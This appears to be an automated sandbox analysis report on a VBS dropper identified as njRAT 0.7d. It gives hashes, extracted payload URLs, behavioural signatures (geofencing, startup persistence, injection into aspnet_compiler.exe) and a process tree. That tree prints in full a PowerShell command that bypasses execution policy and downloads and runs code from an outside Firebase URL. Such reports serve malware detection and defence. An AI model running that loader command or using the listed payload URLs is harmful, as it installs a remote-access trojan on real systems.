Analysis
-
max time kernel
146s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
02-05-2024 13:34
Static task
static1
Behavioral task
behavioral1
Sample
c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1.vbs
Resource
win7-20240220-en
General
-
Target
c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1.vbs
-
Size
271B
-
MD5
b9acaac18eee9b5cde0c6defbe2c1caa
-
SHA1
6f8cb34d61f9136e96345684846edf49dfa976bc
-
SHA256
c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1
-
SHA512
70c8b3742c98e1daf2c7fda40c992621c2250a9dac648c4798370697f5688e1883162079909dd245a33fc064a843a94f84c7399b99bae9b6418a47b3c5e75e12
Malware Config
Extracted
https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/SidM.jpg?alt=media&token=53ed6ff5-09e0-4464-a19c-f0e9d9c6cec8
Extracted
https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/Ssid.jpg?alt=media&token=10629c63-3c23-437a-9543-4f9dcee695bb
https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/Rnew.jpg?alt=media&token=d68ad7e3-80ed-4083-ad53-8af401c5b503
Extracted
njrat
0.7d
H
-
splitter
|'|'|
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 7 4244 powershell.exe 36 3272 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sCs.vbs powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3272 set thread context of 4328 3272 powershell.exe aspnet_compiler.exe -
Processes:
powershell.exepowershell.exepid process 4244 powershell.exe 3272 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 4244 powershell.exe 4244 powershell.exe 3272 powershell.exe 3272 powershell.exe 3272 powershell.exe 3272 powershell.exe -
Suspicious use of AdjustPrivilegeToken 33 IoCs
Processes:
powershell.exepowershell.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 4244 powershell.exe Token: SeDebugPrivilege 3272 powershell.exe Token: SeDebugPrivilege 4328 aspnet_compiler.exe Token: 33 4328 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4328 aspnet_compiler.exe Token: 33 4328 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4328 aspnet_compiler.exe Token: 33 4328 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4328 aspnet_compiler.exe Token: 33 4328 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4328 aspnet_compiler.exe Token: 33 4328 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4328 aspnet_compiler.exe Token: 33 4328 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4328 aspnet_compiler.exe Token: 33 4328 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4328 aspnet_compiler.exe Token: 33 4328 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4328 aspnet_compiler.exe Token: 33 4328 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4328 aspnet_compiler.exe Token: 33 4328 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4328 aspnet_compiler.exe Token: 33 4328 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4328 aspnet_compiler.exe Token: 33 4328 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4328 aspnet_compiler.exe Token: 33 4328 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4328 aspnet_compiler.exe Token: 33 4328 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4328 aspnet_compiler.exe Token: 33 4328 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 4328 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
WScript.exepowershell.exeWScript.exepowershell.exedescription pid process target process PID 4992 wrote to memory of 4244 4992 WScript.exe powershell.exe PID 4992 wrote to memory of 4244 4992 WScript.exe powershell.exe PID 4244 wrote to memory of 1464 4244 powershell.exe WScript.exe PID 4244 wrote to memory of 1464 4244 powershell.exe WScript.exe PID 1464 wrote to memory of 3272 1464 WScript.exe powershell.exe PID 1464 wrote to memory of 3272 1464 WScript.exe powershell.exe PID 3272 wrote to memory of 1680 3272 powershell.exe aspnet_compiler.exe PID 3272 wrote to memory of 1680 3272 powershell.exe aspnet_compiler.exe PID 3272 wrote to memory of 1680 3272 powershell.exe aspnet_compiler.exe PID 3272 wrote to memory of 4328 3272 powershell.exe aspnet_compiler.exe PID 3272 wrote to memory of 4328 3272 powershell.exe aspnet_compiler.exe PID 3272 wrote to memory of 4328 3272 powershell.exe aspnet_compiler.exe PID 3272 wrote to memory of 4328 3272 powershell.exe aspnet_compiler.exe PID 3272 wrote to memory of 4328 3272 powershell.exe aspnet_compiler.exe PID 3272 wrote to memory of 4328 3272 powershell.exe aspnet_compiler.exe PID 3272 wrote to memory of 4328 3272 powershell.exe aspnet_compiler.exe PID 3272 wrote to memory of 4328 3272 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass iex ((New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/SidM.jpg?alt=media&token=53ed6ff5-09e0-4464-a19c-f0e9d9c6cec8'))2⤵
- Blocklisted process makes network request
- Drops startup file
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\sCs.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\sCs.ps14⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3272 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"5⤵PID:1680
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4328
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD56c25e98074e3843e30eeda41a1357b92
SHA188aacfbe76ce89e2024d652a9ac37ad68518e3fe
SHA25617fa8418f7132c304749f477f7b514c3d6358a7d63b5c3f8529055862dfcd67f
SHA51203f82a7f8834e2a914a3486291d9b3cc97642ad8de55035bfc3a172dfe6ea1de2de2a14c974adf1ed32324f7414088f647ce683f0278881c2339d4551efb0e4c
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ioro4gom.or0.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Public\sCs.ps1Filesize
1KB
MD5e0e7ea9409eb39ae9d9e06ea8d2acd94
SHA13b8ab9de2c853a0238f3024eb8905ab81b8f634c
SHA25693b29bea09147a94220823e19c53a36c10ac8689bd196d73ae93e56c6acf3713
SHA51214cb12ce1637b7f2749179330328e6aa20871e6e5783f9e0d709ed2051241f0e4ee645c7d4629146c09c75f28470d4232b13aacc4193007c7b1d8644b25bd48f
-
C:\Users\Public\sCs.vbsFilesize
166B
MD5c3e1b2c797679d84c76dcdd5bb81db0d
SHA1f178c6888aa88ef7e940dd1b572ea9ac8c30c56c
SHA256cc9f01e9c6a3d717e775740b64106245324ecc9c77004f6c9b5d7d2e84cdf80b
SHA512be52acfd7294f31f7ee1c573711c915705f044cb762a6d5b6051f39f9774e7ef52287cfba5361e921ead9ca952e2c34f3a4210a4d8aa6badee78b1e7b713e22c
-
memory/3272-34-0x0000025FA2AD0000-0x0000025FA2ADC000-memory.dmpFilesize
48KB
-
memory/4244-0-0x00007FFDAAEC3000-0x00007FFDAAEC5000-memory.dmpFilesize
8KB
-
memory/4244-1-0x000001C764FF0000-0x000001C765012000-memory.dmpFilesize
136KB
-
memory/4244-11-0x00007FFDAAEC0000-0x00007FFDAB981000-memory.dmpFilesize
10.8MB
-
memory/4244-12-0x00007FFDAAEC0000-0x00007FFDAB981000-memory.dmpFilesize
10.8MB
-
memory/4244-21-0x00007FFDAAEC0000-0x00007FFDAB981000-memory.dmpFilesize
10.8MB
-
memory/4328-35-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB